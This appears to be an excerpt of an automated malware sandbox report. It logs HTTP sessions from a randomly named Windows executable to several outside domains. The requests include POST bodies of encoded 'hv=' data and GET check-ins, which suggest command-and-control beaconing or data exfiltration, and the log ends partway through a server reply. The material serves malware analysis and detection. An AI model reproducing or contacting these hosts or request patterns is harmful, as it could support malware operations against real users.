                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.849720203.161.41.207805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:20.643012047 CEST1645OUTPOST /o2rg/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.marttyes.top
                                                    Origin: http://www.marttyes.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.marttyes.top/o2rg/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 4b 71 45 4a 6f 61 4f 63 6f 50 6f 74 61 58 68 68 66 2f 48 51 41 36 7a 68 4f 50 70 69 71 72 74 30 43 4e 70 7a 4c 44 30 54 6f 45 79 36 44 57 4e 2b 58 39 46 48 31 31 37 64 36 71 6c 51 6f 6d 52 55 4a 47 79 73 6a 37 41 6d 57 55 54 46 49 57 31 65 33 76 74 52 61 54 6c 41 6d 53 58 65 79 2f 2b 68 4b 66 32 69 71 49 63 2f 48 54 50 79 34 6b 45 70 39 4c 5a 74 64 35 56 71 56 56 4e 5a 63 6a 30 4b 41 72 35 6b 32 38 4b 5a 46 30 6c 79 68 33 54 51 77 59 43 4f 6e 68 52 74 45 4c 65 64 6d 53 5a 78 7a 6c 47 46 4e 52 72 39 42 41 2f 41 30 78 42 5a 35 4c 67 70 4b 51 4d 6b 7a 6f 4c 30 4e 33 74 61 45 69 61 43 54 45 6b 62 4f 6a 42 61 6e 38 74 5a 67 2f 43 63 36 57 55 61 6b 34 55 4a 4c 42 4d 78 31 65 48 39 31 72 70 58 36 78 66 31 35 2f 74 4f 6f 2b 64 4b 2b 4c 31 78 70 45 4c 32 7a 71 79 74 41 76 32 53 64 32 51 49 36 76 63 4c 4e 6c 2f 38 47 70 63 75 6f 30 77 54 32 6b 56 5a 4b 62 46 4f 63 35 64 79 6a 61 62 4c 43 68 70 79 6c 54 69 61 44 65 78 6a 64 56 51 73 45 6c 61 4b 72 57 53 72 2f 2b 61 79 4e 50 4e 35 67 77 70 41 39 63 33 [TRUNCATED]
                                                    Data Ascii: hv=KqEJoaOcoPotaXhhf/HQA6zhOPpiqrt0CNpzLD0ToEy6DWN+X9FH117d6qlQomRUJGysj7AmWUTFIW1e3vtRaTlAmSXey/+hKf2iqIc/HTPy4kEp9LZtd5VqVVNZcj0KAr5k28KZF0lyh3TQwYCOnhRtELedmSZxzlGFNRr9BA/A0xBZ5LgpKQMkzoL0N3taEiaCTEkbOjBan8tZg/Cc6WUak4UJLBMx1eH91rpX6xf15/tOo+dK+L1xpEL2zqytAv2Sd2QI6vcLNl/8Gpcuo0wT2kVZKbFOc5dyjabLChpylTiaDexjdVQsElaKrWSr/+ayNPN5gwpA9c3x3RCYfx1G6KiY+aHX53CASilIFR9QurFRWFgRneu0gH4tWH+OlHb9ZAEJvENF9cL8tF0VnpartEzEhAd15yDcVzuGmg4fiAyi9wBiL5gip7JdWjH2gv5phjH5fmWrL9H7wUugbNrlsxPnc12EjwkLhHsxBAl1LzTJn9XpVShRQibgTQpQU1eD22WptN9Fj/dmLRKZTFjRPR8SnS1czrovt8NXceMU2xxElIupRxX0Wu7hD+f6ca0WYeWFC1N6K/GRK79rAaFlSODKW91LBzLpJtqcnXI6YSBMnO8sF8i2H/TSb4nrN0bSQ2dRaTUXGPd45vhmg8iJqThG+2pK6fmMH1cIV8pTKujh4k61wAEvJxM8A1ea4pG1PkQhtq2mEVB8UeInokV1P8w2DXrXpDC5VMLdmtJIOmM1IUyjRXA1saGo+zE0ZKLKso0JuHOyfOb0owVqKxs/H4zpMC0k4lV7K/FIxuEAVtFPWq5i52H4Dbu+5Q0uSmLO7dqt1zi3Nwg36FSymoUtOq6DRDLO8ZxXAS7iK74vrbV51akud7slMDIqywmtLAvjq5JlF1n3FkxFZQpO+6Y0bQQazjmarRdiK17/2nEro79aH90owFGTZK7f5pvd1KL+7WsMqca3H5eYFLJ0DvySajV8fz7bryOsL7Sm3Y6Rxw5YN [TRUNCATED]
                                                    Jul 1, 2024 15:45:21.264017105 CEST533INHTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:45:21 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.849721203.161.41.207805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:23.177057028 CEST349OUTGET /o2rg/?hv=HosprsjiipEFZkdlXtfyIs2HS8VP0Lx1JctxEV0LpDy1TX4kdcFD2HTZ1ZNwt0d2CmaO7pR5URztAlcHvOxdSj57tnDbyp24LsG2z7IhVzqV3j0gtM8YC4wacEpxZhptTA==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.marttyes.top
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:45:23.783843994 CEST548INHTTP/1.1 404 Not Found
                                                    Date: Mon, 01 Jul 2024 13:45:23 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.8497223.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:28.829322100 CEST632OUTPOST /v1kj/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.sponsoraveteran.info
                                                    Origin: http://www.sponsoraveteran.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.sponsoraveteran.info/v1kj/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 51 71 4c 65 35 56 52 39 51 42 67 39 72 31 6c 4f 48 51 36 55 7a 57 78 37 52 33 69 35 44 41 41 34 46 33 48 6c 62 73 38 34 4f 38 32 50 73 34 6c 6a 57 65 2b 52 72 74 32 61 65 79 7a 41 71 7a 75 67 64 44 69 58 65 49 39 56 4d 44 35 44 43 74 6e 4b 75 6c 37 65 7a 4e 35 31 31 4e 6e 73 37 48 65 72 69 78 73 66 55 48 70 72 66 44 4c 63 57 64 76 53 2b 55 6b 46 73 71 58 36 65 76 6d 48 36 45 63 53 62 66 59 75 45 79 6e 2b 61 51 52 65 35 4d 54 7a 56 66 42 32 46 6d 6e 42 76 52 78 50 38 78 31 34 49 2f 42 2f 51 37 6e 63 6a 45 36 32 79 45 4e 70 4e 66 52 6f 68 4a 46 37 61 65 42 36 4a 73 36 51 6c 6d 4b 6e 55 65 30 3d
                                                    Data Ascii: hv=QqLe5VR9QBg9r1lOHQ6UzWx7R3i5DAA4F3Hlbs84O82Ps4ljWe+Rrt2aeyzAqzugdDiXeI9VMD5DCtnKul7ezN511Nns7HerixsfUHprfDLcWdvS+UkFsqX6evmH6EcSbfYuEyn+aQRe5MTzVfB2FmnBvRxP8x14I/B/Q7ncjE62yENpNfRohJF7aeB6Js6QlmKnUe0=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.8497233.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:31.367974997 CEST652OUTPOST /v1kj/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.sponsoraveteran.info
                                                    Origin: http://www.sponsoraveteran.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.sponsoraveteran.info/v1kj/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 51 71 4c 65 35 56 52 39 51 42 67 39 72 52 68 4f 45 33 57 55 6d 6d 78 34 50 6e 69 35 49 67 41 38 46 33 62 6c 62 74 49 6f 4e 4f 53 50 74 5a 56 6a 58 66 2b 52 2b 74 32 61 56 53 7a 46 67 54 76 69 64 44 76 6f 65 4b 35 56 4d 44 64 44 43 76 2f 4b 74 57 69 49 31 64 35 33 74 39 6e 71 6d 58 65 72 69 78 73 66 55 48 38 4f 66 44 44 63 4b 34 6e 53 2f 31 6b 43 79 36 58 35 5a 76 6d 48 73 30 63 65 62 66 59 59 45 32 76 51 61 57 56 65 35 4a 76 7a 57 4b 31 31 50 6d 6e 62 69 78 78 42 37 44 34 30 53 49 42 75 57 61 48 36 38 58 65 53 36 53 67 44 58 39 5a 75 69 4a 74 51 61 64 70 4d 4d 62 6e 34 2f 46 61 58 4b 4a 6a 72 30 46 41 4f 6b 57 46 71 49 52 41 32 75 32 79 66 75 41 31 49
                                                    Data Ascii: hv=QqLe5VR9QBg9rRhOE3WUmmx4Pni5IgA8F3blbtIoNOSPtZVjXf+R+t2aVSzFgTvidDvoeK5VMDdDCv/KtWiI1d53t9nqmXerixsfUH8OfDDcK4nS/1kCy6X5ZvmHs0cebfYYE2vQaWVe5JvzWK11PmnbixxB7D40SIBuWaH68XeS6SgDX9ZuiJtQadpMMbn4/FaXKJjr0FAOkWFqIRA2u2yfuA1I


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.8497243.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:33.911138058 CEST1669OUTPOST /v1kj/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.sponsoraveteran.info
                                                    Origin: http://www.sponsoraveteran.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 1239
                                                    Connection: close
                                                    Referer: http://www.sponsoraveteran.info/v1kj/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 51 71 4c 65 35 56 52 39 51 42 67 39 72 52 68 4f 45 33 57 55 6d 6d 78 34 50 6e 69 35 49 67 41 38 46 33 62 6c 62 74 49 6f 4e 4f 61 50 73 72 64 6a 57 38 47 52 73 64 32 61 4a 69 7a 45 67 54 75 36 64 44 6e 73 65 4b 30 71 4d 46 5a 44 59 4b 6a 4b 6c 48 69 49 38 64 35 33 6b 64 6e 72 37 48 65 36 69 79 45 62 55 48 73 4f 66 44 44 63 4b 35 58 53 36 55 6b 43 77 36 58 36 65 76 6d 62 36 45 63 36 62 66 41 6d 45 32 69 6c 61 6d 31 65 35 74 7a 7a 61 59 74 31 44 6d 6e 64 73 52 77 48 37 44 31 32 53 4f 6b 66 57 61 7a 41 38 58 6d 53 35 48 6c 36 47 4a 52 47 78 5a 68 37 61 4d 39 59 4d 36 4c 48 67 55 71 46 49 49 54 78 39 56 6b 42 75 45 35 42 63 32 4a 42 34 79 4b 57 68 48 59 55 6b 72 36 33 4f 2f 79 6d 70 32 45 54 6a 66 32 54 59 69 6d 50 52 6c 30 54 31 53 6b 43 63 65 6f 6e 51 37 42 68 56 5a 50 36 48 46 41 6b 56 49 55 69 4b 71 76 7a 34 58 57 67 50 67 65 6e 45 41 51 6f 44 38 31 36 49 68 59 41 4e 4e 7a 75 56 62 65 44 53 51 6c 35 2f 78 73 78 7a 53 32 38 6d 37 70 58 63 33 77 64 44 76 67 4c 48 6b 72 64 58 57 4e 7a 72 4a 75 [TRUNCATED]
                                                    Data Ascii: hv=QqLe5VR9QBg9rRhOE3WUmmx4Pni5IgA8F3blbtIoNOaPsrdjW8GRsd2aJizEgTu6dDnseK0qMFZDYKjKlHiI8d53kdnr7He6iyEbUHsOfDDcK5XS6UkCw6X6evmb6Ec6bfAmE2ilam1e5tzzaYt1DmndsRwH7D12SOkfWazA8XmS5Hl6GJRGxZh7aM9YM6LHgUqFIITx9VkBuE5Bc2JB4yKWhHYUkr63O/ymp2ETjf2TYimPRl0T1SkCceonQ7BhVZP6HFAkVIUiKqvz4XWgPgenEAQoD816IhYANNzuVbeDSQl5/xsxzS28m7pXc3wdDvgLHkrdXWNzrJulGO8pVyblbEB9zXIW6QK84bkhcubGYEimNSTvCiNGGbtItYCG9/tEpFo2vFOLeSZs5JxP+a+ZGrHy9/GsglGUklg27tq7vbEGgLrWicpEb5+vLjRCJQA5IzogAZaR/6YEvVBb2zd3cV2/Z1t4mXbPyCSpTzfUwh1JNzp1Wc4r5gdrPxczCjvZVt5hHCPqZ14G3uXgcJjuac9+RPOy351ubYAcGeHsc2aHOpboBU6BYz7Q/Ig67+boGHR5eKL/mVSbf6f//cQgCXXQKKeI3NjdbvVUPDQPx37+fz7yStfQLnW2+8Y22VQE1UyUbUfiAgPGiCPtMttQALnO0D2Bc3lrtlQnFMXUfTNaEYHJ6hj4th4AAvFZ7vr0XW0slMajk8CVTJuO+0uteJ3dOZ68WsMg/xFaH9kaUPqIlpTXLyEsasXSoK6lTym3jqLbthSpEG47T9NbYaE/ei4DFaMCwiyBzsIATBHFL7FnLUuQlK/lgPgujDKTh6dPQWiS1slieFZnsXW4sCHl1ljHmkbmY4wOvg6i3O50MDyVBL2ujEp8jjjjipucS8Qefou/M9w/lOKgr1uotDmew9Eaqj4zTIY8SJHC8z4/26GBH7dg2HJaVeJSxZFL7Hn8jli2eZC4CtQiRlPL4EI6pQWiNCU+YbZrMw95HK0qqWjni [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.8497253.33.130.190805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:36.438674927 CEST357OUTGET /v1kj/?hv=doj+6iUDZydJqFVnCXjkp3F4RUW5KXgrYHqPdL8oMaa0q7VqYsyQxdbUVD3Fk32bJgHvLY4KB1BicN6WuEPq/9BNjeLnpFWO+QoiBFVxHjC/ELqB/38Ky5muYdCtwXhrYw==&Sbzdb=DvgXWdN HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Host: www.sponsoraveteran.info
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Jul 1, 2024 15:45:36.905607939 CEST404INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 01 Jul 2024 13:45:36 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 264
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 76 3d 64 6f 6a 2b 36 69 55 44 5a 79 64 4a 71 46 56 6e 43 58 6a 6b 70 33 46 34 52 55 57 35 4b 58 67 72 59 48 71 50 64 4c 38 6f 4d 61 61 30 71 37 56 71 59 73 79 51 78 64 62 55 56 44 33 46 6b 33 32 62 4a 67 48 76 4c 59 34 4b 42 31 42 69 63 4e 36 57 75 45 50 71 2f 39 42 4e 6a 65 4c 6e 70 46 57 4f 2b 51 6f 69 42 46 56 78 48 6a 43 2f 45 4c 71 42 2f 33 38 4b 79 35 6d 75 59 64 43 74 77 58 68 72 59 77 3d 3d 26 53 62 7a 64 62 3d 44 76 67 58 57 64 4e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hv=doj+6iUDZydJqFVnCXjkp3F4RUW5KXgrYHqPdL8oMaa0q7VqYsyQxdbUVD3Fk32bJgHvLY4KB1BicN6WuEPq/9BNjeLnpFWO+QoiBFVxHjC/ELqB/38Ky5muYdCtwXhrYw==&Sbzdb=DvgXWdN"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.84972738.47.232.185805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:42.295532942 CEST599OUTPOST /e5ni/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yvw66.top
                                                    Origin: http://www.yvw66.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 203
                                                    Connection: close
                                                    Referer: http://www.yvw66.top/e5ni/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 30 67 49 32 57 2b 6c 34 4e 55 42 71 4b 64 61 67 6f 41 4c 6d 38 47 2b 69 4e 32 56 39 45 6e 72 47 71 4b 64 61 59 7a 6e 38 34 59 69 4e 59 51 4c 45 42 43 39 34 51 6f 76 4b 6d 73 58 4a 66 4f 73 67 70 56 53 48 53 38 69 37 76 6d 42 75 54 62 66 33 46 76 5a 54 46 71 34 77 57 58 30 73 57 30 75 45 4f 78 4a 44 46 48 63 6e 78 34 71 49 61 45 30 66 5a 64 6c 32 49 49 39 5a 63 4f 4d 39 6f 6f 69 42 50 68 41 32 65 2b 51 4c 79 49 4e 52 50 67 42 64 6e 55 53 75 43 56 42 6d 39 45 44 69 47 6f 74 65 74 73 34 71 59 6f 2b 54 6e 54 45 76 62 66 6e 34 47 6e 37 6c 47 74 36 30 47 74 6a 43 36 56 4b 46 4e 6b 69 6a 47 68 63 3d
                                                    Data Ascii: hv=0gI2W+l4NUBqKdagoALm8G+iN2V9EnrGqKdaYzn84YiNYQLEBC94QovKmsXJfOsgpVSHS8i7vmBuTbf3FvZTFq4wWX0sW0uEOxJDFHcnx4qIaE0fZdl2II9ZcOM9ooiBPhA2e+QLyINRPgBdnUSuCVBm9EDiGotets4qYo+TnTEvbfn4Gn7lGt60GtjC6VKFNkijGhc=
                                                    Jul 1, 2024 15:45:43.212255001 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:45:43 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.84972838.47.232.185805992C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 1, 2024 15:45:44.838224888 CEST619OUTPOST /e5ni/ HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.yvw66.top
                                                    Origin: http://www.yvw66.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Content-Length: 223
                                                    Connection: close
                                                    Referer: http://www.yvw66.top/e5ni/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 68 76 3d 30 67 49 32 57 2b 6c 34 4e 55 42 71 4c 35 65 67 71 6a 54 6d 36 6d 2b 68 51 47 56 39 4e 48 72 43 71 4b 5a 61 59 79 54 73 35 75 36 4e 59 79 54 45 41 47 70 34 52 6f 76 4b 79 63 58 47 42 2b 74 4e 70 56 66 36 53 2b 32 37 76 6d 56 75 54 5a 48 33 43 64 78 55 47 61 34 79 61 33 30 69 59 55 75 45 4f 78 4a 44 46 48 67 4a 78 34 69 49 62 33 73 66 5a 2f 4e 35 58 34 39 65 62 4f 4d 39 73 6f 69 46 50 68 41 55 65 38 6b 68 79 4f 42 52 50 68 78 64 32 6d 36 68 4a 56 41 76 69 55 43 58 48 36 38 58 6f 4c 34 54 64 35 4c 38 70 7a 63 61 54 4a 4b 53 63 46 7a 6a 46 74 53 66 47 75 4c 30 2f 69 58 74 58 48 79 54 59 32 4a 48 77 37 7a 66 41 49 6c 31 52 33 58 62 50 4f 64 4d 65 74 61 2b
                                                    Data Ascii: hv=0gI2W+l4NUBqL5egqjTm6m+hQGV9NHrCqKZaYyTs5u6NYyTEAGp4RovKycXGB+tNpVf6S+27vmVuTZH3CdxUGa4ya30iYUuEOxJDFHgJx4iIb3sfZ/N5X49ebOM9soiFPhAUe8khyOBRPhxd2m6hJVAviUCXH68XoL4Td5L8pzcaTJKScFzjFtSfGuL0/iXtXHyTY2JHw7zfAIl1R3XbPOdMeta+
                                                    Jul 1, 2024 15:45:45.833457947 CEST289INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 01 Jul 2024 13:45:45 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
